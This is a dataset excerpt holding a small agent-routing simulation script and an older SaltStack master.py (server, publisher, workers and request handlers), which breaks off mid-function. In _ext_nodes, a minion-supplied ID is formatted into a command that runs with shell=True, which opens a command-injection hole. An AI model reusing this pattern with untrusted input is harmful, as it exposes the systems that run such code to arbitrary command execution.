source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
simulation.py
|
"""
@file simulation.py
@brief quick test sim to try out the agent/arena and rendering
@author Graham Riches
@details
"""
import threading
from core.render_engine import Renderer
from core.command_line import CommandLine
from routing.a_star import AStar
from routing.managers.sequential import Sequential
from core.agent import *
from core.arena import Arena
BASE_TIME_STEP = 0.05
BASE_DPI = 40
# CLI thread
def cli_thread_func(arena: Arena, agents: list) -> None:
cli = CommandLine(arena, agents)
while True:
cli.get_input()
# setup an arena
sim_arena = Arena(40, 40)
# create some agents and add them to the agents list
sim_agent = Agent(0, 0, BASE_TIME_STEP)
sim_agent_1 = Agent(5, 5, BASE_TIME_STEP)
sim_agent_1.set_kinematic_parameters(4, 4, 4)
sim_agent.set_kinematic_parameters(6, 6, 6)
sim_agents = list()
sim_agents.append(sim_agent)
sim_agents.append(sim_agent_1)
# setup the routing algorithm
algorithm = AStar(sim_arena, sim_agents)
algorithm.turn_factor = 2
# create the pathing algorithm
routing_manager = Sequential(sim_arena, sim_agents, algorithm)
# setup the renderer
renderer = Renderer(sim_arena, sim_agents, routing_manager, BASE_TIME_STEP, BASE_DPI)
# start the CLI thread
cli_thread = threading.Thread(target=cli_thread_func, args=(sim_arena, sim_agents))
cli_thread.start()
while True:
renderer.render_arena()
routing_manager.run_time_step()
for agent_id, agent in enumerate(sim_agents):
renderer.render_agent(agent_id)
renderer.update()
|
master.py
|
'''
This module contains all of the routines needed to set up a master server, this
involves preparing the three listeners and the workers needed by the master.
'''
# Import python libs
import os
import re
import time
import errno
import fnmatch
import signal
import shutil
import stat
import logging
import hashlib
import datetime
import pwd
import getpass
import resource
import subprocess
import multiprocessing
# Import third party libs
import zmq
import yaml
from M2Crypto import RSA
# Import salt libs
import salt.crypt
import salt.utils
import salt.client
import salt.payload
import salt.pillar
import salt.state
import salt.runner
import salt.auth
import salt.wheel
import salt.minion
import salt.search
import salt.utils
import salt.utils.atomicfile
import salt.utils.event
import salt.utils.verify
import salt.utils.minions
import salt.utils.gzip_util
from salt.utils.debug import enable_sigusr1_handler
log = logging.getLogger(__name__)
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(('Process did not die with terminate(): {0}'
.format(proc.pid)))
os.kill(signal.SIGKILL, proc.pid)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
class MasterExit(SystemExit):
'''
Named exit exception for the master process exiting
'''
pass
class SMaster(object):
'''
Create a simple salt-master, this will generate the top level master
'''
def __init__(self, opts):
'''
Create a salt master server instance
'''
self.opts = opts
self.master_key = salt.crypt.MasterKeys(self.opts)
self.key = self.__prep_key()
self.crypticle = self.__prep_crypticle()
def __prep_crypticle(self):
'''
Return the crypticle used for AES
'''
return salt.crypt.Crypticle(self.opts, self.opts['aes'])
def __prep_key(self):
'''
A key needs to be placed in the filesystem with permissions 0400 so
clients are required to run as root.
'''
users = []
keys = {}
acl_users = set(self.opts['client_acl'].keys())
if self.opts.get('user'):
acl_users.add(self.opts['user'])
acl_users.add(getpass.getuser())
for user in pwd.getpwall():
users.append(user.pw_name)
for user in acl_users:
log.info(
'Preparing the {0} key for local communication'.format(
user
)
)
cumask = os.umask(191)
if not user in users:
log.error('ACL user {0} is not available'.format(user))
continue
keyfile = os.path.join(
self.opts['cachedir'], '.{0}_key'.format(user)
)
if os.path.exists(keyfile):
log.debug('Removing stale keyfile: {0}'.format(keyfile))
os.unlink(keyfile)
key = salt.crypt.Crypticle.generate_key_string()
with salt.utils.fopen(keyfile, 'w+') as fp_:
fp_.write(key)
os.umask(cumask)
os.chmod(keyfile, 256)
try:
os.chown(keyfile, pwd.getpwnam(user).pw_uid, -1)
except OSError:
# The master is not being run as root and can therefore not
# chown the key file
pass
keys[user] = key
return keys
class Master(SMaster):
'''
The salt master server
'''
def __init__(self, opts):
'''
Create a salt master server instance
'''
SMaster.__init__(self, opts)
def _clear_old_jobs(self):
'''
Clean out the old jobs
'''
jid_root = os.path.join(self.opts['cachedir'], 'jobs')
search = salt.search.Search(self.opts)
last = time.time()
while True:
if self.opts['keep_jobs'] != 0:
cur = "{0:%Y%m%d%H}".format(datetime.datetime.now())
for top in os.listdir(jid_root):
t_path = os.path.join(jid_root, top)
for final in os.listdir(t_path):
f_path = os.path.join(t_path, final)
jid_file = os.path.join(f_path, 'jid')
if not os.path.isfile(jid_file):
continue
with salt.utils.fopen(jid_file, 'r') as fn_:
jid = fn_.read()
if len(jid) < 18:
# Invalid jid, scrub the dir
shutil.rmtree(f_path)
elif int(cur) - int(jid[:10]) > self.opts['keep_jobs']:
shutil.rmtree(f_path)
if self.opts.get('search'):
now = time.time()
if now - last > self.opts['search_index_interval']:
search.index()
try:
time.sleep(60)
except KeyboardInterrupt:
break
def __set_max_open_files(self):
# Let's check to see how our max open files(ulimit -n) setting is
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
log.info(
'Current values for max open files soft/hard setting: '
'{0}/{1}'.format(
mof_s, mof_h
)
)
# Let's grab, from the configuration file, the value to raise max open
# files to
mof_c = self.opts['max_open_files']
if mof_c > mof_h:
# The configured value is higher than what's allowed
log.warning(
'The value for the \'max_open_files\' setting, {0}, is higher '
'than what the user running salt is allowed to raise to, {1}. '
'Defaulting to {1}.'.format(mof_c, mof_h)
)
mof_c = mof_h
if mof_s < mof_c:
# There's room to raise the value. Raise it!
log.warning('Raising max open files value to {0}'.format(mof_c))
resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h))
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
log.warning(
'New values for max open files soft/hard values: '
'{0}/{1}'.format(mof_s, mof_h)
)
def start(self):
'''
Turn on the master server components
'''
log.info(
'salt-master is starting as user \'{0}\''.format(getpass.getuser())
)
enable_sigusr1_handler()
self.__set_max_open_files()
clear_old_jobs_proc = multiprocessing.Process(
target=self._clear_old_jobs)
clear_old_jobs_proc.start()
reqserv = ReqServer(
self.opts,
self.crypticle,
self.key,
self.master_key)
reqserv.start_publisher()
reqserv.start_event_publisher()
reqserv.start_reactor()
def sigterm_clean(signum, frame):
'''
Cleaner method for stopping multiprocessing processes when a
SIGTERM is encountered. This is required when running a salt
master under a process minder like daemontools
'''
log.warn(('Caught signal {0}, stopping the Salt Master'
.format(signum)))
clean_proc(clear_old_jobs_proc)
clean_proc(reqserv.publisher)
clean_proc(reqserv.eventpublisher)
for proc in reqserv.work_procs:
clean_proc(proc)
raise MasterExit
signal.signal(signal.SIGTERM, sigterm_clean)
try:
reqserv.run()
except KeyboardInterrupt:
# Shut the master down gracefully on SIGINT
log.warn('Stopping the Salt Master')
raise SystemExit('\nExiting on Ctrl-c')
class Publisher(multiprocessing.Process):
'''
The publishing interface, a simple zeromq publisher that sends out the
commands.
'''
def __init__(self, opts):
super(Publisher, self).__init__()
self.opts = opts
def run(self):
'''
Bind to the interface specified in the configuration file
'''
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
# if 2.1 >= zmq < 3.0, we only have one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, 1)
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
pub_sock.setsockopt(zmq.SNDHWM, 1)
pub_sock.setsockopt(zmq.RCVHWM, 1)
pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
# Start the minion command publisher
log.info('Starting the Salt Publisher on {0}'.format(pub_uri))
pub_sock.bind(pub_uri)
pull_sock.bind(pull_uri)
# Restrict access to the socket
os.chmod(
os.path.join(self.opts['sock_dir'],
'publish_pull.ipc'),
448
)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
package = pull_sock.recv()
pub_sock.send(package)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except KeyboardInterrupt:
pub_sock.setsockopt(zmq.LINGER, 2500)
pub_sock.close()
pull_sock.setsockopt(zmq.LINGER, 2500)
pull_sock.close()
finally:
context.term()
class ReqServer(object):
'''
Starts up the master request server, minions send results to this
interface.
'''
def __init__(self, opts, crypticle, key, mkey):
self.opts = opts
self.master_key = mkey
self.context = zmq.Context(self.opts['worker_threads'])
# Prepare the zeromq sockets
self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
self.workers = self.context.socket(zmq.DEALER)
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
# Prepare the AES key
self.key = key
self.crypticle = crypticle
def __bind(self):
'''
Binds the reply server
'''
log.info('Setting up the master communication server')
self.clients.bind(self.uri)
self.work_procs = []
for ind in range(int(self.opts['worker_threads'])):
self.work_procs.append(MWorker(self.opts,
self.master_key,
self.key,
self.crypticle))
for ind, proc in enumerate(self.work_procs):
log.info('Starting Salt worker process {0}'.format(ind))
proc.start()
self.workers.bind(self.w_uri)
while True:
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
def start_publisher(self):
'''
Start the salt publisher interface
'''
# Start the publisher
self.publisher = Publisher(self.opts)
self.publisher.start()
def start_event_publisher(self):
'''
Start the salt publisher interface
'''
# Start the publisher
self.eventpublisher = salt.utils.event.EventPublisher(self.opts)
self.eventpublisher.start()
def start_reactor(self):
'''
Start the reactor, but only if the reactor interface is configured
'''
if self.opts.get('reactor'):
self.reactor = salt.utils.event.Reactor(self.opts)
self.reactor.start()
def run(self):
'''
Start up the ReqServer
'''
self.__bind()
def destroy(self):
self.clients.setsockopt(zmq.LINGER, 2500)
self.clients.close()
self.workers.setsockopt(zmq.LINGER, 2500)
self.workers.close()
self.context.term()
def __del__(self):
self.destroy()
class MWorker(multiprocessing.Process):
'''
The worker multiprocess instance to manage the backend operations for the
salt master.
'''
def __init__(self,
opts,
mkey,
key,
crypticle):
multiprocessing.Process.__init__(self)
self.opts = opts
self.serial = salt.payload.Serial(opts)
self.crypticle = crypticle
self.mkey = mkey
self.key = key
def __bind(self):
'''
Bind to the local port
'''
context = zmq.Context(1)
socket = context.socket(zmq.REP)
w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Worker binding to socket {0}'.format(w_uri))
try:
socket.connect(w_uri)
while True:
try:
package = socket.recv()
payload = self.serial.loads(package)
ret = self.serial.dumps(self._handle_payload(payload))
socket.send(ret)
# Properly handle EINTR from SIGUSR1
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except KeyboardInterrupt:
socket.setsockopt(zmq.LINGER, 2500)
socket.close()
finally:
context.term()
def _handle_payload(self, payload):
'''
The _handle_payload method is the key method used to figure out what
needs to be done with communication to the server
'''
try:
key = payload['enc']
load = payload['load']
except KeyError:
return ''
return {'aes': self._handle_aes,
'pub': self._handle_pub,
'clear': self._handle_clear}[key](load)
def _handle_clear(self, load):
'''
Take care of a cleartext command
'''
log.info('Clear payload received with command {cmd}'.format(**load))
return getattr(self.clear_funcs, load['cmd'])(load)
def _handle_pub(self, load):
'''
Handle a command sent via a public key pair
'''
log.info('Pubkey payload received with command {cmd}'.format(**load))
def _handle_aes(self, load):
'''
Handle a command sent via an aes key
'''
try:
data = self.crypticle.loads(load)
except Exception:
return ''
if 'cmd' not in data:
log.error('Received malformed command {0}'.format(data))
return {}
log.info('AES payload received with command {0}'.format(data['cmd']))
return self.aes_funcs.run_func(data['cmd'], data)
def run(self):
'''
Start a Master Worker
'''
self.clear_funcs = ClearFuncs(
self.opts,
self.key,
self.mkey,
self.crypticle)
self.aes_funcs = AESFuncs(self.opts, self.crypticle)
self.__bind()
class AESFuncs(object):
'''
Set up functions that are available when the load is encrypted with AES
'''
# The AES Functions:
#
def __init__(self, opts, crypticle):
self.opts = opts
self.event = salt.utils.event.MasterEvent(self.opts['sock_dir'])
self.serial = salt.payload.Serial(opts)
self.crypticle = crypticle
self.ckminions = salt.utils.minions.CkMinions(opts)
# Create the tops dict for loading external top data
self.tops = salt.loader.tops(self.opts)
# Make a client
self.local = salt.client.LocalClient(self.opts['conf_file'])
# Create the master minion to access the external job cache
self.mminion = salt.minion.MasterMinion(self.opts)
def __find_file(self, path, env='base'):
'''
Search the environment for the relative path
'''
fnd = {'path': '',
'rel': ''}
if os.path.isabs(path):
return fnd
if env not in self.opts['file_roots']:
return fnd
for root in self.opts['file_roots'][env]:
full = os.path.join(root, path)
if os.path.isfile(full) and not self.__is_file_ignored(full):
fnd['path'] = full
fnd['rel'] = path
return fnd
return fnd
def __verify_minion(self, id_, token):
'''
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
'''
pub_path = os.path.join(self.opts['pki_dir'], 'minions', id_)
with salt.utils.fopen(pub_path, 'r') as fp_:
minion_pub = fp_.read()
tmp_pub = salt.utils.mkstemp()
with salt.utils.fopen(tmp_pub, 'w+') as fp_:
fp_.write(minion_pub)
pub = None
try:
pub = RSA.load_pub_key(tmp_pub)
except RSA.RSAError as e:
log.error('Unable to load temporary public key "{0}": {1}'
.format(tmp_pub, e))
try:
os.remove(tmp_pub)
if pub.public_decrypt(token, 5) == 'salt':
return True
except RSA.RSAError, e:
log.error('Unable to decrypt token: {0}'.format(e))
log.error('Salt minion claiming to be {0} has attempted to'
'communicate with the master and could not be verified'
.format(id_))
return False
def __is_file_ignored(self, fn):
'''
If file_ignore_regex or file_ignore_glob were given in config,
compare the given file path against all of them and return True
on the first match.
'''
if self.opts['file_ignore_regex']:
for r in self.opts['file_ignore_regex']:
if re.search(r, fn):
log.debug('File matching file_ignore_regex. Skipping: {0}'.format(fn))
return True
if self.opts['file_ignore_glob']:
for g in self.opts['file_ignore_glob']:
if fnmatch.fnmatch(fn, g):
log.debug('File matching file_ignore_glob. Skipping: {0}'.format(fn))
return True
return False
def _ext_nodes(self, load):
'''
Return the results from an external node classifier if one is
specified
'''
if not 'id' in load:
log.error('Received call for external nodes without an id')
return {}
ret = {}
# The old ext_nodes method is set to be deprecated in 0.10.4
# and should be removed within 3-5 releases in favor of the
# "master_tops" system
if self.opts['external_nodes']:
if not salt.utils.which(self.opts['external_nodes']):
log.error(('Specified external nodes controller {0} is not'
' available, please verify that it is installed'
'').format(self.opts['external_nodes']))
return {}
cmd = '{0} {1}'.format(self.opts['external_nodes'], load['id'])
ndata = yaml.safe_load(
subprocess.Popen(
cmd,
shell=True,
stdout=subprocess.PIPE
).communicate()[0])
if 'environment' in ndata:
env = ndata['environment']
else:
env = 'base'
if 'classes' in ndata:
if isinstance(ndata['classes'], dict):
ret[env] = list(ndata['classes'])
elif isinstance(ndata['classes'], list):
ret[env] = ndata['classes']
else:
return ret
# Evaluate all configured master_tops interfaces
opts = {}
grains = {}
if 'opts' in load:
opts = load['opts']
if 'grains' in load['opts']:
grains = load['opts']['grains']
for fun in self.tops:
try:
ret.update(self.tops[fun](opts=opts, grains=grains))
except Exception as exc:
log.error(
('Top function {0} failed with error {1} for minion '
'{2}').format(fun, exc, load['id'])
)
# If anything happens in the top generation, log it and move on
pass
return ret
def _serve_file(self, load):
'''
Return a chunk from a file based on the data received
'''
ret = {'data': '',
'dest': ''}
if 'path' not in load or 'loc' not in load or 'env' not in load:
return ret
fnd = self.__find_file(load['path'], load['env'])
if not fnd['path']:
return ret
ret['dest'] = fnd['rel']
gzip = load.get('gzip', None)
with salt.utils.fopen(fnd['path'], 'rb') as fp_:
fp_.seek(load['loc'])
data = fp_.read(self.opts['file_buffer_size'])
#if not data:
# ret.update(self._file_hash(load))
if gzip and data:
data = salt.utils.gzip_util.compress(data, gzip)
ret['gzip'] = gzip
ret['data'] = data
return ret
def _file_hash(self, load):
'''
Return a file hash, the hash type is set in the master config file
'''
if 'path' not in load or 'env' not in load:
return ''
path = self.__find_file(load['path'], load['env'])['path']
if not path:
return {}
ret = {}
with salt.utils.fopen(path, 'rb') as fp_:
ret['hsum'] = getattr(hashlib, self.opts['hash_type'])(
fp_.read()).hexdigest()
ret['hash_type'] = self.opts['hash_type']
return ret
def _file_list(self, load):
'''
Return a list of all files on the file server in a specified
environment
'''
ret = []
if load['env'] not in self.opts['file_roots']:
return ret
for path in self.opts['file_roots'][load['env']]:
for root, dirs, files in os.walk(path, followlinks=True):
for fn in files:
rel_fn = os.path.relpath(
os.path.join(root, fn),
path
)
if not self.__is_file_ignored(rel_fn):
ret.append(rel_fn)
return ret
def _file_list_emptydirs(self, load):
'''
Return a list of all empty directories on the master
'''
ret = []
if load['env'] not in self.opts['file_roots']:
return ret
for path in self.opts['file_roots'][load['env']]:
for root, dirs, files in os.walk(path, followlinks=True):
if len(dirs) == 0 and len(files) == 0:
rel_fn = os.path.relpath(root, path)
if not self.__is_file_ignored(rel_fn):
ret.append(rel_fn)
return ret
def _dir_list(self, load):
'''
Return a list of all directories on the master
'''
ret = []
if load['env'] not in self.opts['file_roots']:
return ret
for path in self.opts['file_roots'][load['env']]:
for root, dirs, files in os.walk(path, followlinks=True):
ret.append(os.path.relpath(root, path))
return ret
def _master_opts(self, load):
'''
Return the master options to the minion
'''
return self.opts
def _pillar(self, load):
'''
Return the pillar data for the minion
'''
if 'id' not in load or 'grains' not in load or 'env' not in load:
return False
pillar = salt.pillar.Pillar(
self.opts,
load['grains'],
load['id'],
load['env'])
data = pillar.compile_pillar()
if self.opts.get('minion_data_cache', False):
cdir = os.path.join(self.opts['cachedir'], 'minions', load['id'])
if not os.path.isdir(cdir):
os.makedirs(cdir)
datap = os.path.join(cdir, 'data.p')
with salt.utils.fopen(datap, 'w+') as fp_:
fp_.write(
self.serial.dumps(
{'grains': load['grains'],
'pillar': data})
)
return data
def _master_state(self, load):
'''
Call the master to compile a master side highstate
'''
if 'opts' not in load or 'grains' not in load:
return False
return salt.state.master_compile(
self.opts,
load['opts'],
load['grains'],
load['opts']['id'],
load['opts']['environment'])
def _minion_event(self, load):
'''
Receive an event from the minion and fire it on the master event
interface
'''
if 'id' not in load or 'tag' not in load or 'data' not in load:
return False
tag = load['tag']
return self.event.fire_event(load, tag)
def _return(self, load):
'''
Handle the return data sent from the minions
'''
# If the return data is invalid, just ignore it
if 'return' not in load or 'jid' not in load or 'id' not in load:
return False
if load['jid'] == 'req':
# The minion is returning a standalone job, request a jobid
load['jid'] = salt.utils.prep_jid(
self.opts['cachedir'],
self.opts['hash_type'])
log.info('Got return from {id} for job {jid}'.format(**load))
self.event.fire_event(load, load['jid'])
if self.opts['master_ext_job_cache']:
fstr = '{0}.returner'.format(self.opts['master_ext_job_cache'])
self.mminion.returners[fstr](load)
return
if not self.opts['job_cache'] or self.opts.get('ext_job_cache'):
return
jid_dir = salt.utils.jid_dir(
load['jid'],
self.opts['cachedir'],
self.opts['hash_type']
)
if not os.path.isdir(jid_dir):
log.error(
'An inconsistency occurred, a job was received with a job id '
'that is not present on the master: {jid}'.format(**load)
)
return False
hn_dir = os.path.join(jid_dir, load['id'])
if not os.path.isdir(hn_dir):
os.makedirs(hn_dir)
# Otherwise the minion has already returned this jid and it should
# be dropped
else:
log.error(
('An extra return was detected from minion {0}, please'
' verify the minion, this could be a replay'
' attack').format(load['id'])
)
return False
self.serial.dump(
load['return'],
# Use atomic open here to avoid the file being read before it's
# completely written to. Refs #1935
salt.utils.atomicfile.atomic_open(
os.path.join(hn_dir, 'return.p'), 'w+'
)
)
if 'out' in load:
self.serial.dump(
load['out'],
# Use atomic open here to avoid the file being read before
# it's completely written to. Refs #1935
salt.utils.atomicfile.atomic_open(
os.path.join(hn_dir, 'out.p'), 'w+'
)
)
def _syndic_return(self, load):
'''
Receive a syndic minion return and format it to look like returns from
individual minions.
'''
# Verify the load
if 'return' not in load or 'jid' not in load or 'id' not in load:
return None
# set the write flag
jid_dir = salt.utils.jid_dir(
load['jid'],
self.opts['cachedir'],
self.opts['hash_type']
)
if not os.path.isdir(jid_dir):
log.error(
'An inconsistency occurred, a job was received with a job id '
'that is not present on the master: {jid}'.format(**load)
)
return False
wtag = os.path.join(jid_dir, 'wtag_{0}'.format(load['id']))
try:
with salt.utils.fopen(wtag, 'w+') as fp_:
fp_.write('')
except (IOError, OSError):
log.error(
('Failed to commit the write tag for the syndic return,'
' are permissions correct in the cache dir:'
' {0}?').format(self.opts['cachedir'])
)
return False
# Format individual return loads
self.event.fire_event({'syndic': load['return'].keys()}, load['jid'])
for key, item in load['return'].items():
ret = {'jid': load['jid'],
'id': key,
'return': item}
if 'out' in load:
ret['out'] = load['out']
self._return(ret)
if os.path.isfile(wtag):
os.remove(wtag)
def minion_runner(self, clear_load):
'''
Execute a runner from a minion, return the runner's function data
'''
if 'peer_run' not in self.opts:
return {}
if not isinstance(self.opts['peer_run'], dict):
return {}
if 'fun' not in clear_load\
or 'arg' not in clear_load\
or 'id' not in clear_load\
or 'tok' not in clear_load:
return {}
if not self.__verify_minion(clear_load['id'], clear_load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
msg = 'Minion id {0} is not who it says it is!'.format(
clear_load['id'])
log.warn(msg)
return {}
perms = set()
for match in self.opts['peer_run']:
if re.match(match, clear_load['id']):
# This is the list of funcs/modules!
if isinstance(self.opts['peer_run'][match], list):
perms.update(self.opts['peer_run'][match])
good = False
for perm in perms:
if re.match(perm, clear_load['fun']):
good = True
if not good:
return {}
# Prepare the runner object
opts = {'fun': clear_load['fun'],
'arg': clear_load['arg'],
'doc': False,
'conf_file': self.opts['conf_file']}
opts.update(self.opts)
runner = salt.runner.Runner(opts)
return runner.run()
def minion_publish(self, clear_load):
'''
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
peer:
.*:
- .*
This configuration will enable all minions to execute all commands.
peer:
foo.example.com:
- test.*
This configuration will only allow the minion foo.example.com to
execute commands from the test module
'''
# Verify that the load is valid
if 'peer' not in self.opts:
return {}
if not isinstance(self.opts['peer'], dict):
return {}
if 'fun' not in clear_load\
or 'arg' not in clear_load\
or 'tgt' not in clear_load\
or 'ret' not in clear_load\
or 'tok' not in clear_load\
or 'id' not in clear_load:
return {}
# If the command will make a recursive publish don't run
if re.match('publish.*', clear_load['fun']):
return {}
# Check the permissions for this minion
if not self.__verify_minion(clear_load['id'], clear_load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
msg = 'Minion id {0} is not who it says it is!'.format(
clear_load['id'])
log.warn(msg)
return {}
perms = []
for match in self.opts['peer']:
if re.match(match, clear_load['id']):
# This is the list of funcs/modules!
if isinstance(self.opts['peer'][match], list):
perms.extend(self.opts['peer'][match])
if ',' in clear_load['fun']:
# 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']]
clear_load['fun'] = clear_load['fun'].split(',')
arg_ = []
for arg in clear_load['arg']:
arg_.append(arg.split())
clear_load['arg'] = arg_
good = self.ckminions.auth_check(
perms,
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
if not good:
return {}
# Set up the publication payload
jid = salt.utils.prep_jid(
self.opts['cachedir'],
self.opts['hash_type']
)
load = {
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'tgt_type': clear_load.get('tgt_type', 'glob'),
'tgt': clear_load['tgt'],
'jid': jid,
'ret': clear_load['ret'],
'id': clear_load['id'],
}
self.serial.dump(
load, salt.utils.fopen(
os.path.join(
salt.utils.jid_dir(
jid,
self.opts['cachedir'],
self.opts['hash_type']
),
'.load.p'
),
'w+')
)
# Save the load to the ext_job_cace if it is turned on
if self.opts['ext_job_cache']:
try:
fstr = '{0}.save_load'.format(self.opts['ext_job_cache'])
self.mminion.returners[fstr](clear_load['jid'], clear_load)
except KeyError:
msg = ('The specified returner used for the external job '
'cache "{0}" does not have a save_load function!'
).format(self.opts['ext_job_cache'])
log.critical(msg)
payload = {'enc': 'aes'}
expr_form = 'glob'
timeout = 5
if 'tmo' in clear_load:
try:
timeout = int(clear_load['tmo'])
except ValueError:
msg = 'Failed to parse timeout value: {0}'.format(
clear_load['tmo'])
log.warn(msg)
return {}
if 'tgt_type' in clear_load:
load['tgt_type'] = clear_load['tgt_type']
expr_form = load['tgt_type']
if 'timeout' in clear_load:
timeout = clear_load['timeout']
# Encrypt!
payload['load'] = self.crypticle.dumps(load)
# Connect to the publisher
context = zmq.Context(1)
pub_sock = context.socket(zmq.PUSH)
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
pub_sock.connect(pull_uri)
log.info(('Publishing minion job: #{jid}, func: "{fun}", args:'
' "{arg}", target: "{tgt}"').format(**load))
pub_sock.send(self.serial.dumps(payload))
# Run the client get_returns method based on the form data sent
if 'form' in clear_load:
ret_form = clear_load['form']
else:
ret_form = 'clean'
if ret_form == 'clean':
try:
return self.local.get_returns(
jid,
self.ckminions.check_minions(
clear_load['tgt'],
expr_form
),
timeout
)
finally:
pub_sock.setsockopt(zmq.LINGER, 2500)
pub_sock.close()
context.term()
elif ret_form == 'full':
ret = self.local.get_full_returns(
jid,
self.ckminions.check_minions(
clear_load['tgt'],
expr_form
),
timeout
)
ret['__jid__'] = jid
try:
return ret
finally:
pub_sock.setsockopt(zmq.LINGER, 2500)
pub_sock.close()
context.term()
def run_func(self, func, load):
'''
Wrapper for running functions executed with AES encryption
'''
# Don't honor private functions
if func.startswith('__'):
return self.crypticle.dumps({})
# Run the func
if hasattr(self, func):
ret = getattr(self, func)(load)
else:
log.error(('Received function {0} which is unavailable on the '
'master, returning False').format(func))
return self.crypticle.dumps(False)
# Don't encrypt the return value for the _return func
# (we don't care about the return value, so why encrypt it?)
if func == '_return':
return ret
if func == '_pillar' and 'id' in load:
if not load.get('ver') == '2' and self.opts['pillar_version'] == 1:
# Authorized to return old pillar proto
return self.crypticle.dumps(ret)
# encrypt with a specific aes key
pubfn = os.path.join(self.opts['pki_dir'],
'minions',
load['id'])
key = salt.crypt.Crypticle.generate_key_string()
pcrypt = salt.crypt.Crypticle(
self.opts,
key)
try:
pub = RSA.load_pub_key(pubfn)
except RSA.RSAError:
return self.crypticle.dumps({})
pret = {}
pret['key'] = pub.public_encrypt(key, 4)
pret['pillar'] = pcrypt.dumps(ret)
return pret
# AES Encrypt the return
return self.crypticle.dumps(ret)
class ClearFuncs(object):
'''
Set up functions that are safe to execute when commands sent to the master
without encryption and authentication
'''
# The ClearFuncs object encapsulates the functions that can be executed in
# the clear:
# publish (The publish from the LocalClient)
# _auth
def __init__(self, opts, key, master_key, crypticle):
self.opts = opts
self.serial = salt.payload.Serial(opts)
self.key = key
self.master_key = master_key
self.crypticle = crypticle
# Create the event manager
self.event = salt.utils.event.MasterEvent(self.opts['sock_dir'])
# Make a client
self.local = salt.client.LocalClient(self.opts['conf_file'])
# Make an minion checker object
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make an Auth object
self.loadauth = salt.auth.LoadAuth(opts)
# Stand up the master Minion to access returner data
self.mminion = salt.minion.MasterMinion(self.opts)
# Make a wheel object
self.wheel_ = salt.wheel.Wheel(opts)
def _send_cluster(self):
'''
Send the cluster data out
'''
log.debug('Sending out cluster data')
ret = self.local.cmd(self.opts['cluster_masters'],
'cluster.distrib',
self._cluster_load(),
0,
'list'
)
log.debug('Cluster distributed: {0}'.format(ret))
def _cluster_load(self):
'''
Generates the data sent to the cluster nodes.
'''
minions = {}
master_pem = ''
with salt.utils.fopen(self.opts['conf_file'], 'r') as fp_:
master_conf = fp_.read()
minion_dir = os.path.join(self.opts['pki_dir'], 'minions')
for host in os.listdir(minion_dir):
pub = os.path.join(minion_dir, host)
minions[host] = salt.utils.fopen(pub, 'r').read()
if self.opts['cluster_mode'] == 'full':
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
with salt.utils.fopen(master_pem_path) as fp_:
master_pem = fp_.read()
return [minions,
master_conf,
master_pem,
self.opts['conf_file']]
def _check_permissions(self, filename):
'''
check if the specified filename has correct permissions
'''
if 'os' in os.environ:
if os.environ['os'].startswith('Windows'):
return True
import pwd # after confirming not running Windows
import grp
try:
user = self.opts['user']
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
except KeyError:
err = ('Failed to determine groups for user '
'{0}. The user is not available.\n').format(user)
log.error(err)
return False
fmode = os.stat(filename)
if os.getuid() == 0:
if fmode.st_uid == uid or not fmode.st_gid == gid:
return True
elif self.opts.get('permissive_pki_access', False) \
and fmode.st_gid in groups:
return True
else:
if stat.S_IWOTH & fmode.st_mode:
# don't allow others to write to the file
return False
# check group flags
if self.opts.get('permissive_pki_access', False) \
and stat.S_IWGRP & fmode.st_mode:
return True
elif stat.S_IWGRP & fmode.st_mode:
return False
# check if writable by group or other
if not (stat.S_IWGRP & fmode.st_mode or
stat.S_IWOTH & fmode.st_mode):
return True
return False
def _check_autosign(self, keyid):
'''
Checks if the specified keyid should automatically be signed.
'''
if self.opts['auto_accept']:
return True
autosign_file = self.opts.get("autosign_file", None)
if not autosign_file or not os.path.exists(autosign_file):
return False
if not self._check_permissions(autosign_file):
message = "Wrong permissions for {0}, ignoring content"
log.warn(message.format(autosign_file))
return False
with salt.utils.fopen(autosign_file, 'r') as fp_:
